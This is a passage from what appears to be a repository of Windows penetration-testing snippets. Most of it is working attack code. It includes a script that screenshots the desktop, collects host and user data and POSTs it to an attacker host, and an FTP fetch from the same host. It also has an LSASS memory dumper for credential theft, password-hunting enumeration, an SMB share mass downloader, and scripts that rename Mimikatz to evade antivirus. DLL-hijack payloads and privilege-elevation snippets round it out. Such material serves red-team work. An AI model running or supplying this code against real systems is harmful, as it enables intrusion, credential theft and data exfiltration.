 6 | $screens = [Windows.Forms.Screen]::AllScreens
 7 | $top = ($screens.Bounds.Top | Measure-Object -Minimum).Minimum
 8 | $left = ($screens.Bounds.Left | Measure-Object -Minimum).Minimum
 9 | $width = ($screens.Bounds.Right | Measure-Object -Maximum).Maximum
10 | $height = ($screens.Bounds.Bottom | Measure-Object -Maximum).Maximum
11 | $bounds = [Drawing.Rectangle]::FromLTRB($left, $top, $width, $height)
12 | $screen = New-Object System.Drawing.Bitmap ([int]$bounds.width), ([int]$bounds.height)
13 | $graphics = [Drawing.Graphics]::FromImage($screen)
14 | $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size)
15 | $screenStream = New-Object System.IO.MemoryStream
16 | $screen.save($screenStream, [System.Drawing.Imaging.ImageFormat]::Jpeg)
17 | $screenBytes = $screenStream.ToArray()
18 | $screenStream.Flush()
19 | $screenStream.Dispose()
20 | $screenshot = [convert]::ToBase64String($screenBytes)
21 | $graphics.Dispose()
22 | $screen.Dispose()
23 | 
24 | $os = $((Get-WmiObject -class Win32_OperatingSystem).Caption)
25 | $hostname = $env:Computername
26 | $domain = $env:UserDomain
27 | $user = "$env:USERNAME@$domain"
28 | $hwid = (Get-WmiObject Win32_ComputerSystemProduct).UUID
29 | $ipv4 = (Test-Connection -ComputerName $Hostname -Count 1).IPV4Address.IPAddressToString
30 | $arch = $env:PROCESSOR_ARCHITECTURE
31 | $isadmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
32 | $report = $Hostname + "," + $Ipv4 + "," + $Arch + "," + $Username + "," + $IsAdmin + "," + $screenshot
33 | 
34 | $certString = "MIIF[...]B3Ms="
35 | 
36 | $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2
37 | $cert.Import([System.Text.Encoding]::UTF8.GetBytes($certString))
38 | $encrypted = $cert.PublicKey.Key.Encrypt([System.Text.Encoding]::UTF8.GetBytes($report), $false)
39 | $encrypted = [System.Convert]::ToBase64String($encrypted)
40 | $encrypted
41 | 
42 | Invoke-WebRequest -UseBasicParsing http://VAR_ATTACKER_HOST:443/ -ContentType "text/html" -Method POST -Body $encrypted
43 | 


--------------------------------------------------------------------------------
/snippets/windows/utils/PortScanning.ps1:
--------------------------------------------------------------------------------
 1 | $ErrorActionPreference = "SilentlyContinue"
 2 | $ports = 1..65535
 3 | $ip = "VAR_TARGET_HOST"
 4 | 
 5 | foreach ($port in $ports) {
 6 |     if(Test-Connection -BufferSize 32 -Count 1 -Quiet -ComputerName $ip) {
 7 |         $socket = new-object System.Net.Sockets.TcpClient($ip, $port)
 8 |         If($socket.Connected) {
 9 |             "$ip:$port"
10 |             $socket.Close()
11 |         }
12 |     }
13 | }


--------------------------------------------------------------------------------
/snippets/windows/utils/Self-Elevate.ps1:
--------------------------------------------------------------------------------
1 | if (-Not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')) {
2 |  if ([int](Get-CimInstance -Class Win32_OperatingSystem | Select-Object -ExpandProperty BuildNumber) -ge 6000) {
3 |   $CommandLine = "-File `"" + $MyInvocation.MyCommand.Path + "`" " + $MyInvocation.UnboundArguments
4 |   Start-Process -FilePath PowerShell.exe -Verb Runas -ArgumentList $CommandLine
5 |   Exit
6 |  }
7 | }


--------------------------------------------------------------------------------
/snippets/windows/utils/SharingIsCaring.ps1:
--------------------------------------------------------------------------------
  1 | # ░▒▓ SharingIsCaring.ps1 ▓▒░
  2 | #
  3 | # Massive SMB shares downloader used to test for data exposure in local networks
  4 | #
  5 | # Example:
  6 | #   C:\> powershell -exec bypass .\SharingIsCaring.ps1 -FileName hosts.txt
  7 | 
  8 | [CmdletBinding()]
  9 | 
 10 | Param(
 11 |     [Parameter(Mandatory=$true)]
 12 |     [String] $FileName,
 13 |     [String[]] $ExcludeShares = @("IPC$", "print$", "SYSVOL"),
 14 |     [Int] $ThrottleLimit = 16,
 15 |     [Int] $Timeout = 1800
 16 | )
 17 | 
 18 | $HostNames = Get-Content $FileName
 19 | 
 20 | $StartTime = Get-Date
 21 | 
 22 | $RunspaceTimers = [HashTable]::Synchronized(@{})
 23 | $Runspaces = New-Object -TypeName System.Collections.ArrayList
 24 | $RunspaceCounter = 1
 25 | 
 26 | $ISS = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault()
 27 | $ISS.Variables.Add(
 28 |     (New-Object -TypeName System.Management.Automation.Runspaces.SessionStateVariableEntry -ArgumentList 'RunspaceTimers', $RunspaceTimers, '')
 29 | )
 30 | 
 31 | $RunspacePool = [System.Management.Automation.Runspaces.RunspaceFactory]::CreateRunspacePool(1, $ThrottleLimit, $ISS, $Host)
 32 | $RunspacePool.Open()
 33 | 
 34 | $ShareCopyBlock =
 35 | {
 36 |     [CmdletBinding()]
 37 |     Param(
 38 |         [int] $ID,
 39 |         [string] $CopySrc,
 40 |         [string] $CopyDst
 41 |     )
 42 |     $RunspaceTimers.$ID = Get-Date
 43 |     New-Item -Path $CopyDst -Type Directory -ErrorAction SilentlyContinue
 44 |     Copy-Item -Path $CopySrc -Destination $CopyDst -Force -Recurse -ErrorAction SilentlyContinue
 45 | }
 46 | 
 47 | function Get-Result
 48 | {
 49 |     [CmdletBinding()]
 50 |     Param(
 51 |         [switch] $Wait
 52 |     )
 53 |     do
 54 |     {
 55 |         $More = $false
 56 |         foreach ($Runspace in $Runspaces) {
 57 |             $StartTime = $RunspaceTimers[$Runspace.ID]
 58 |             if ($Runspace.Handle.IsCompleted)
 59 |             {
 60 |                 $Runspace.PowerShell.EndInvoke($Runspace.Handle)
 61 |                 $Runspace.PowerShell.Dispose()
 62 |                 $Runspace.PowerShell = $null
 63 |                 $Runspace.Handle = $null
 64 |             }
 65 |             elseif ($null -ne $Runspace.Handle)
 66 |             {
 67 |                 $More = $true
 68 |             }
 69 |             if ($Timeout -and $StartTime)
 70 |             {
 71 |                 if ((New-TimeSpan -Start $StartTime).TotalSeconds -ge $Timeout -and $Runspace.PowerShell) {
 72 |                     Write-Warning -Message ('Timeout {0}' -f $Runspace.IObject)
 73 |                     $Runspace.PowerShell.Dispose()
 74 |                     $Runspace.PowerShell = $null
 75 |                     $Runspace.Handle = $null
 76 |                 }
 77 |             }
 78 |         }
 79 |         if ($More -and $PSBoundParameters['Wait'])
 80 |         {
 81 |             Start-Sleep -Milliseconds 100
 82 |         }
 83 |         foreach ($Thread in $Runspaces.Clone())
 84 |         {
 85 |             if (-not $Thread.Handle) {
 86 |                 $Runspaces.Remove($Thread)
 87 |             }
 88 |         }
 89 |     }
 90 |     while ($More -and $PSBoundParameters['Wait'])
 91 | }
 92 | 
 93 | Write-Verbose -Message "$(Get-Date): Downloading shares..."
 94 | 
 95 | foreach ($HostName in $HostNames)
 96 | {
 97 |     Get-Result
 98 |     $RunspaceCounter++
 99 |     Write-Host "$(Get-Date): Checking $HostName"
100 |     $NetView = net view \\$HostName /all
101 |     if ($NetView) {
102 |         $FromLine = ($NetView | Select-String -Pattern "---" | Select-Object LineNumber).LineNumber
103 |         $NetView[$FromLine..($NetView.count - 3)] | ForEach-Object {
104 |             $ShareLine = $_ -split "\s{2,}"
105 |             $Share = $ShareLine[0]
106 |             if ($ExcludeShares -NotContains $Share) {
107 |                 $CopySrc = "\\$HostName\$Share\*"
108 |                 $CopyDst = "$(Get-Location)\$HostName\$Share\"
109 |                 $Snippet = [System.Management.Automation.PowerShell]::Create().AddScript($ShareCopyBlock)
110 |                 [void] $Snippet.AddParameter('ID', $RunspaceCounter)
111 |                 [void] $Snippet.AddParameter('CopySrc', $CopySrc)
112 |                 [void] $Snippet.AddParameter('CopyDst', $CopyDst)
113 |                 $Snippet.RunspacePool = $RunspacePool
114 |                 [void]$Runspaces.Add(@{
115 |                     Handle = $Snippet.BeginInvoke()
116 |                     PowerShell = $Snippet
117 |                     ID = $RunspaceCounter
118 |                 })
119 |             }
120 |         }
121 |     }
122 | }
123 | 
124 | Get-Result -Wait
125 | Write-Progress -Activity 'Processing' -Status 'Done' -Completed
126 | $RunspacePool.Close()
127 | $RunspacePool.Dispose()


--------------------------------------------------------------------------------
/snippets/windows/utils/SuperPing.ps1:
--------------------------------------------------------------------------------
 1 | # Author: Merakel
 2 | 
 3 | $ping =
 4 |     "server1",
 5 |     "server2",
 6 |     "server3"
 7 | 
 8 | Function Super-Ping{
 9 |     Param([Parameter(ValueFromPipeline=$true,Mandatory=$true)]$ping)
10 | 
11 |     Begin{
12 |         $runSpacePool = [RunSpaceFactory]::CreateRunspacePool(1, 5)
13 |         $runSpacePool.Open()
14 | 
15 |         $jobs = @()
16 |         $data = @()
17 |     }
18 | 
19 |     Process{
20 |         $flags= @{"computername" = "$ping" ; "count" = "3"}
21 |         Write-Host $flags
22 |         $pipeline = [powershell]::Create().AddCommand("Test-Connection")
23 |         Foreach($f in $flags.keys)
24 |                 {
25 |                 $pipeline.AddParameter($f, $flags.$f) | Out-Null
26 |                 }
27 | 
28 |         $pipeline.RunSpacePool = $runSpacePool #This sets the RunSpacePool to execute our current pipeline
29 |         $status = $pipeline.BeginInvoke() #This executes the RunSpacePool we just currently created.
30 | 
31 |         $job = "" | Select-Object Status, Pipeline
32 |         $job.Status = $status
33 |         $job.Pipeline = $pipeline
34 |         $jobs += $job
35 |     }
36 | 
37 |     End{
38 |         While (@($jobs | Where-Object {$_.Status-ne $Null}).count -gt 0){
39 |             ForEach ($job in $obs){
40 |                 If($job.Status.IsCompleted -eq $True){
41 |                     $data += $job.Pipeline.EndInvoke($job.Status)
42 |                     $job.Pipeline.Dispose()
43 |                     $job.Status= $Null
44 |                     $job.Pipeline= $Null
45 |                 }
46 |             }
47 |         }
48 |         Return $data
49 |     }
50 | }
51 | 
52 | $ping | Super-Ping


--------------------------------------------------------------------------------
/snippets/windows/utils/Win10FirewallRules.ps1:
--------------------------------------------------------------------------------
1 | Get-NetFirewallRule -Action Allow -Enabled True -Direction Inbound |
2 | Format-Table -Property @{Name='DisplayName'; Expression={$_.DisplayName}; Width=15},
3 | @{Name='Program'; Expression={($PSItem | Get-NetFirewallApplicationFilter).Program}; Width=60},
4 | @{Name='Protocol'; Expression={($PSItem | Get-NetFirewallPortFilter).Protocol}; Width=10},
5 | @{Name='LocalPort'; Expression={($PSItem | Get-NetFirewallPortFilter).LocalPort}; Width=5},
6 | @{Name='RemotePort'; Expression={($PSItem | Get-NetFirewallPortFilter).RemotePort}; Width=5},
7 | @{Name='RemoteAddress'; Expression={($PSItem | Get-NetFirewallPortFilter).RemoteAddress}; Width=15}


--------------------------------------------------------------------------------
/snippets/windows/utils/WindowsEnum.ps1:
--------------------------------------------------------------------------------
  1 | # Source https://raw.githubusercontent.com/absolomb/WindowsEnum/master/WindowsEnum.ps1
  2 | # Usage
  3 | # run script directly from powershell for quick standard checks
  4 | # 
  5 | # For quick standard checks directly from CMD:
  6 | # powershell -nologo -executionpolicy bypass -file WindowsEnum.ps1
  7 | #
  8 | # To run extensive file searches use extended parameter (it can take a long time, be patient!):
  9 | # PS C:\> .\WindowsEnum.ps1 extended
 10 | # From CMD:
 11 | # powershell -nologo -executionpolicy bypass -file WindowsEnum.ps1 extended
 12 | 
 13 | 
 14 | param($extended)
 15 |  
 16 | $lines="------------------------------------------"
 17 | function whost($a) {
 18 |     Write-Host
 19 |     Write-Host -ForegroundColor Green $lines
 20 |     Write-Host -ForegroundColor Green " "$a 
 21 |     Write-Host -ForegroundColor Green $lines
 22 | }
 23 | 
 24 | 
 25 | whost "Windows Enumeration Script v 0.1
 26 |           by absolomb
 27 |        www.sploitspren.com"
 28 | 
 29 | $standard_commands = [ordered]@{
 30 | 
 31 |     'Basic System Information'                    = 'Start-Process "systeminfo" -NoNewWindow -Wait';
 32 |     'Environment Variables'                       = 'Get-ChildItem Env: | ft Key,Value';
 33 |     'Network Information'                         = 'Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address';
 34 |     'DNS Servers'                                 = 'Get-DnsClientServerAddress -AddressFamily IPv4 | ft';
 35 |     'ARP cache'                                   = 'Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State';
 36 |     'Routing Table'                               = 'Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex';
 37 |     'Network Connections'                         = 'Start-Process "netstat" -ArgumentList "-ano" -NoNewWindow -Wait | ft';
 38 |     'Connected Drives'                            = 'Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft';
 39 |     'Firewall Config'                             = 'Start-Process "netsh" -ArgumentList "firewall show config" -NoNewWindow -Wait | ft';
 40 |     'Current User'                                = 'Write-Host $env:UserDomain\$env:UserName';
 41 |     'User Privileges'                             = 'start-process "whoami" -ArgumentList "/priv" -NoNewWindow -Wait | ft';
 42 |     'Local Users'                                 = 'Get-LocalUser | ft Name,Enabled,LastLogon';
 43 |     'Logged in Users'                             = 'Start-Process "qwinsta" -NoNewWindow -Wait | ft';
 44 |     'Credential Manager'                          = 'start-process "cmdkey" -ArgumentList "/list" -NoNewWindow -Wait | ft'
 45 |     'User Autologon Registry Items'               = 'Get-ItemProperty -Path "Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon" | select "Default*" | ft';
 46 |     'Local Groups'                                = 'Get-LocalGroup | ft Name';
 47 |     'Local Administrators'                        = 'Get-LocalGroupMember Administrators | ft Name, PrincipalSource';
 48 |     'User Directories'                            = 'Get-ChildItem C:\Users | ft Name';
 49 |     'Searching for SAM backup files'              = 'Test-Path %SYSTEMROOT%\repair\SAM ; Test-Path %SYSTEMROOT%\system32\config\regback\SAM';
 50 |     'Running Processes'                           = 'gwmi -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize';
 51 |     'Installed Software Directories'              = 'Get-ChildItem "C:\Program Files", "C:\Program Files (x86)" | ft Parent,Name,LastWriteTime';
 52 |     'Software in Registry'                        = 'Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name';
 53 |     'Folders with Everyone Permissions'           = 'Get-ChildItem "C:\Program Files\*", "C:\Program Files (x86)\*" | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match "Everyone"} } catch {}} | ft';
 54 |     'Folders with BUILTIN\User Permissions'       = 'Get-ChildItem "C:\Program Files\*", "C:\Program Files (x86)\*" | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match "BUILTIN\Users"} } catch {}} | ft';
 55 |     'Checking registry for AlwaysInstallElevated' = 'Test-Path -Path "Registry::HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer" | ft';
 56 |     'Unquoted Service Paths'                      = 'gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike ''"*''} | select PathName, DisplayName, Name | ft';
 57 |     'Scheduled Tasks'                             = 'Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State';
 58 |     'Tasks Folder'                                = 'Get-ChildItem C:\Windows\Tasks | ft';
 59 |     'Startup Commands'                            = 'Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl';
 60 |     
 61 | }
 62 | 
 63 | $extended_commands = [ordered]@{
 64 | 
 65 |     'Searching for Unattend and Sysprep files' = 'Get-Childitem -Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")} | Out-File C:\temp\unattendfiles.txt';
 66 |     'Searching for web.config files'           = 'Get-Childitem -Path C:\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue | Out-File C:\temp\webconfigfiles.txt';
 67 |     'Searching for other interesting files'    = 'Get-Childitem -Path C:\ -Include *password*,*cred*,*vnc* -File -Recurse -ErrorAction SilentlyContinue | Out-File C:\temp\otherfiles.txt';
 68 |     'Searching for various config files'       = 'Get-Childitem -Path C:\ -Include php.ini,httpd.conf,httpd-xampp.conf,my.ini,my.cnf -File -Recurse -ErrorAction SilentlyContinue | Out-File C:\temp\configfiles.txt'
 69 |     'Searching HKLM for passwords'             = 'reg query HKLM /f password /t REG_SZ /s | Out-File C:\temp\hklmpasswords.txt';
 70 |     'Searching HKCU for passwords'             = 'reg query HKCU /f password /t REG_SZ /s | Out-File C:\temp\hkcupasswords.txt';
 71 |     'Searching for files with passwords'       = 'Get-ChildItem c:\* -include *.xml,*.ini,*.txt,*.config -Recurse -ErrorAction SilentlyContinue | Where-Object {$_.PSPath -notlike "*C:\temp*" -and $_.PSParentPath -notlike "*Reference Assemblies*" -and $_.PSParentPath -notlike "*Windows Kits*"}| Select-String -Pattern "password" | Out-File C:\temp\password.txt';
 72 |     
 73 | }
 74 | function RunCommands($commands) {
 75 |     ForEach ($command in $commands.GetEnumerator()) {
 76 |         whost $command.Name
 77 |         Invoke-Expression $command.Value
 78 |     }
 79 | }
 80 | 
 81 | 
 82 | RunCommands($standard_commands)
 83 | 
 84 | if ($extended) {
 85 |     if ($extended.ToLower() -eq 'extended') {
 86 |         $result = Test-Path C:\temp
 87 |         if ($result -eq $False) {
 88 |             New-Item C:\temp -type directory
 89 |         }
 90 |         whost "Results writing to C:\temp\
 91 |     This may take a while..."
 92 |         RunCommands($extended_commands)
 93 |         whost "Script Finished! Check your files in C:\temp\"
 94 |     }
 95 | }
 96 | else {
 97 |     whost "Script finished!"
 98 | }
 99 | 
100 | 
101 | 
102 | 
103 | 
104 | 


--------------------------------------------------------------------------------
/snippets/windows/utils/base64.vbs:
--------------------------------------------------------------------------------
 1 | Function Base64Encode(inData)
 2 |   Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
 3 |   Dim cOut, sOut, I
 4 |   For I = 1 To Len(inData) Step 3
 5 |     Dim nGroup, pOut, sGroup
 6 |     nGroup = &H10000 * Asc(Mid(inData, I, 1)) + _
 7 |       &H100 * MyASC(Mid(inData, I + 1, 1)) + MyASC(Mid(inData, I + 2, 1))
 8 |     nGroup = Oct(nGroup)
 9 |     nGroup = String(8 - Len(nGroup), "0") & nGroup
10 |     pOut = Mid(Base64, CLng("&o" & Mid(nGroup, 1, 2)) + 1, 1) + _
11 |       Mid(Base64, CLng("&o" & Mid(nGroup, 3, 2)) + 1, 1) + _
12 |       Mid(Base64, CLng("&o" & Mid(nGroup, 5, 2)) + 1, 1) + _
13 |       Mid(Base64, CLng("&o" & Mid(nGroup, 7, 2)) + 1, 1)
14 |     sOut = sOut + pOut
15 |   Next
16 |   Select Case Len(inData) Mod 3
17 |     Case 1: '8 bit final
18 |       sOut = Left(sOut, Len(sOut) - 2) + "=="
19 |     Case 2: '16 bit final
20 |       sOut = Left(sOut, Len(sOut) - 1) + "="
21 |   End Select
22 |   Base64Encode = sOut
23 | End Function
24 | Function MyASC(OneChar)
25 |   If OneChar = "" Then MyASC = 0 Else MyASC = Asc(OneChar)
26 | End Function


--------------------------------------------------------------------------------
/snippets/windows/utils/ftp.bat:
--------------------------------------------------------------------------------
1 | REM ftp -v -n -s:ftp.txt
2 | 
3 | echo open VAR_ATTACKER_HOST > ftp.txt
4 | echo user anonymous >> ftp.txt
5 | echo ftp >> ftp.txt
6 | echo bin >> ftp.txt
7 | echo get file >> ftp.txt
8 | echo bye >> ftp.txt


--------------------------------------------------------------------------------
/snippets/windows/utils/icacls.bat:
--------------------------------------------------------------------------------
 1 | @echo off
 2 | REM Source: https://raw.githubusercontent.com/ankh2054/windows-pentest/master/icacls.bat
 3 | REM Description: Script that queries all services and searches for exeuctables that give the Everyone group RW access.
 4 | REM Type: Incorrect file permissions
 5 | REM Note: The ^ characters escapes certain characters that brerak the FOR loop.
 6 | REM Note: tokens=1* - The value at the first delimeter and everything after. 
 7 | for /f "tokens=1*" %%m in ('sc query state^= all ^| find "SERVICE_NAME"') do (
 8 |     for /f "tokens=1* delims=: " %%r in ('sc qc "%%~n" ^| find "BINARY_PATH_NAME"') do (
 9 |         for /f "delims=" %%x in ('echo(%%~s^| findstr /L /V /I /C:"%SystemRoot%\System32" /C:"%SystemRoot%\SysWOW64"') do (
10 |             icacls "%%~x"
11 |         )
12 |     )
13 | )
14 | 


--------------------------------------------------------------------------------
/snippets/windows/utils/mimikatz-Invoke-Mimikatz-obfuscate.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # Original: https://gist.githubusercontent.com/infosecn1nja/bb0771adb879f1690a0dd8dfa0fc728b/raw/70d45ad3ac382554d897f1d7b3673452fa7a6dfb/obfuscate-mimikatz.sh
 4 | 
 5 | if [[ -z $1 ]]; then
 6 |     echo './obfuscate-Invoke-Mimikatz.sh Invoke-Mimikatz.ps1 Invoke-Minidoggiez.ps1'
 7 |     exit 1
 8 | fi
 9 | 
10 | 
11 | randstr(){< /dev/urandom tr -dc a-zA-Z0-9 | head -c${1:-8};}
12 | 
13 | cp $1 $2
14 | sed -i -e "s/Invoke-Mimikatz/Invoke-Minidoggiez/g" $2
15 | sed -i -e '/<#/,/#>/c\\' $2
16 | sed -i -e "s/^[[:space:]]*#.*$//g" $2
17 | sed -i -e "s/DumpCreds/PullLove/g" $2
18 | sed -i -e "s/DumpCerts/PullUniverse/g" $2
19 | sed -i -e "s/CustomCommand/CustomizedThing/g" $2
20 | sed -i -e "s/TypeBuilder/$(randstr)/g" $2
21 | sed -i -e "s/Win32Types/$(randstr)/g" $2
22 | sed -i -e "s/Win32Functions/$(randstr)/g" $2
23 | sed -i -e "s/shellcode/$(randstr)/g" $2
24 | sed -i -e "s/PEBytes64/$(randstr)/g" $2
25 | sed -i -e "s/PEBytes32/$(randstr)/g" $2
26 | sed -i -e "s/ArgumentPtr/$(randstr)/g" $2
27 | sed -i -e "s/CallDllMainSC1/$(randstr)/g" $2
28 | 


--------------------------------------------------------------------------------
/snippets/windows/utils/mimikatz-clone-obfuscated.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # Original: https://s3cur3th1ssh1t.github.io/Building-a-custom-Mimikatz-binary/
 4 | 
 5 | if [[ -z $1 ]]; then
 6 |     echo './mimikatz-clone-obfuscated.sh'
 7 |     exit 1
 8 | fi
 9 | 
10 | 
11 | randstr(){< /dev/urandom tr -dc a-zA-Z0-9 | head -c${1:-8};}
12 | 
13 | randname=randstr()
14 | RANDNAME=${randname^^}
15 | Randname=${randname^}
16 | randname2=randstr()
17 | RANDNAME2=${randname2^^}
18 | Randname2=${randname2^}
19 | 
20 | git clone https://github.com/gentilkiwi/mimikatz.git $randname
21 | mv $randname/mimikatz $randname/$randname
22 | find windows/ -type f -print0 | xargs -0 sed -i "s/mimikatz/$randname/g"
23 | find windows/ -type f -print0 | xargs -0 sed -i "s/MIMIKATZ/$RANDNAME/g"
24 | find windows/ -type f -print0 | xargs -0 sed -i "s/Mimikatz/$Randname/g"
25 | find windows/ -type f -print0 | xargs -0 sed -i "s/DELPY/$Randname/g"
26 | find windows/ -type f -print0 | xargs -0 sed -i "s/Benjamin/$Randname/g"
27 | find windows/ -type f -print0 | xargs -0 sed -i "s/benjamin@gentilkiwi.com/$Randname/g"
28 | find windows/ -type f -print0 | xargs -0 sed -i "s/creativecommons/$Randname/g"
29 | find windows/ -type f -print0 | xargs -0 sed -i "s/gentilkiwi/$Randname/g"
30 | find windows/ -type f -print0 | xargs -0 sed -i "s/kiwi/$randname2/g"
31 | find windows/ -type f -print0 | xargs -0 sed -i "s/KIWI/$RANDNAME2/g"
32 | find windows/ -type f -print0 | xargs -0 sed -i "s/Kiwi/$Randname2/g"
33 | find windows/ -type f -print0 | xargs -0 sed -i "s/A La Vie/$(randstr)/g"
34 | find windows/ -type f -print0 | xargs -0 sed -i "s/Amour/$(randstr)/g"
35 | find windows/ -type f -print0 | xargs -0 sed -i "s/mimidrv/$(randstr)/g"
36 | find windows/ -type f -name '*mimikatz*' | while read FILE ; do
37 |     newfile="$(echo ${FILE} |sed -e "s/mimikatz/$randname/g")";
38 |     mv "${FILE}" "${newfile}";
39 | done
40 | find windows/ -type f -name '*kiwi*' | while read FILE ; do
41 |     newfile="$(echo ${FILE} |sed -e "s/kiwi/$randname2/g")";
42 |     mv "${FILE}" "${newfile}";
43 | done


--------------------------------------------------------------------------------
/snippets/windows/utils/minidump.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Diagnostics;
 3 | using System.Runtime.InteropServices; using System.IO;
 4 | 
 5 | namespace MiniDump {
 6 | 
 7 |     class Program {
 8 | 
 9 |         [DllImport("Dbghelp.dll")]
10 |             static extern bool MiniDumpWriteDump(IntPtr hProcess, int ProcessId, IntPtr hFile, int DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);
11 |         [DllImport("kernel32.dll")]
12 |             static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId);
13 | 
14 |         static void Main(string[] args) {
15 |             if (args.Length == 0)
16 |             {
17 |                 System.Console.WriteLine("Provide dump file path");
18 |                 return 1;
19 |             }            
20 |             FileStream dumpFile = new FileStream(args[0], FileMode.Create);
21 |             Process[] lsass = Process.GetProcessesByName("lsass");
22 |             int lsass_pid = lsass[0].Id;
23 |             IntPtr handle = OpenProcess(0x001F0FFF, false, lsass_pid);
24 |             bool dumped = MiniDumpWriteDump(handle, lsass_pid, dumpFile.SafeFileHandle.DangerousGetHandle(), 2, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);
25 |         }
26 | 
27 |     }
28 | 
29 | }


--------------------------------------------------------------------------------
/snippets/windows/utils/run_bat.c:
--------------------------------------------------------------------------------
 1 | // x86_64-w64-mingw32-gcc run_bat.c -o mssvc.exe
 2 | 
 3 | #include 
 4 | 
 5 | int main ()
 6 | {
 7 |     int i;
 8 |     i = system("cmd /c C:\\Python27\\get.bat");
 9 |     return 0;
10 | }


--------------------------------------------------------------------------------
/snippets/windows/utils/run_dll1.c:
--------------------------------------------------------------------------------
 1 | // Minimalistic approach
 2 | // x86_64-w64-mingw32-gcc run_dll1.c -o lib.dll -shared
 3 | 
 4 | #include 
 5 | 
 6 | BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
 7 |     if (dwReason == DLL_PROCESS_ATTACH) {
 8 |         system("cmd.exe /c whoami > %TEMP%\\whoami.txt");
 9 |         ExitProcess(0);
10 |     }
11 |     return TRUE;
12 | }


--------------------------------------------------------------------------------
/snippets/windows/utils/run_dll2.cpp:
--------------------------------------------------------------------------------
 1 | // x86_64-w64-mingw32-g++ run_dll2.cpp -o lib.dll -shared
 2 | // get.bat: %COMSPEC% /c whoami > C:\Python27\whoami.txt
 3 | 
 4 | #include 
 5 | 
 6 | int fileExist(LPCTSTR file) {
 7 | 	WIN32_FIND_DATA FindFileData;
 8 | 	HANDLE hFind;
 9 | 
10 | 	hFind = FindFirstFile(file, &FindFileData);
11 | 	if (hFind == INVALID_HANDLE_VALUE)
12 | 	{
13 | 		MessageBox(0, NULL, TEXT("File not found"), MB_OK);
14 | 		return 0;
15 | 	}
16 | 	else
17 | 	{
18 | 		FindClose(hFind);
19 | 	}
20 | 	return 1;
21 | }
22 | 
23 | void scriptExec(void) {
24 | 
25 | 	TCHAR batPath[50] = TEXT("C:\\Python27\\get.bat");
26 | 
27 | 	if (!fileExist(batPath)) {
28 | 		return;
29 | 	}
30 | 
31 | 	STARTUPINFO info = { sizeof(info) };
32 | 	PROCESS_INFORMATION processInfo;
33 | 	TCHAR lpszClientPath[100] = TEXT("C:\\Windows\\system32\\cmd.exe /c C:\\Python27\\get.bat");
34 | 	if (CreateProcess(NULL, lpszClientPath, NULL, NULL, TRUE, 0, NULL, NULL, &info, &processInfo))
35 | 	{
36 | 		WaitForSingleObject(processInfo.hProcess, INFINITE);
37 | 		CloseHandle(processInfo.hProcess);
38 | 		CloseHandle(processInfo.hThread);
39 | 		MessageBox(0, NULL, TEXT("Success"), MB_OK);
40 | 	}
41 | 	else {
42 | 		MessageBox(0, NULL, TEXT("Failure"), MB_OK);
43 | 	}
44 | }
45 | 
46 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
47 | {
48 | 	switch (ul_reason_for_call)
49 | 	{
50 | 		case DLL_PROCESS_ATTACH:
51 | 			scriptExec();
52 | 			break;
53 | 		case DLL_THREAD_ATTACH:
54 | 			break;
55 | 		case DLL_THREAD_DETACH:
56 | 			break;
57 | 		case DLL_PROCESS_DETACH:
58 | 			break;
59 | 	}
60 | 	return TRUE;
61 | }
62 | 
63 | extern "C" __declspec(dllexport) int main() {
64 | }


--------------------------------------------------------------------------------
/snippets/windows/utils/runas1.bat:
--------------------------------------------------------------------------------
1 | REM powershell -ExecutionPolicy Bypass -File runas.ps1
2 | 
3 | echo $username = 'VAR_USERNAME' > runas.ps1
4 | echo $securePassword = ConvertTo-SecureString 'VAR_PASSWORD' -AsPlainText -Force >> runas.ps1
5 | echo $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword >> runas.ps1
6 | echo Start-Process cmd.exe -Credential $credential >> runas.ps1


--------------------------------------------------------------------------------
/snippets/windows/utils/runas2.bat:
--------------------------------------------------------------------------------
1 | REM powershell -ExecutionPolicy Bypass -File script.ps1
2 | 
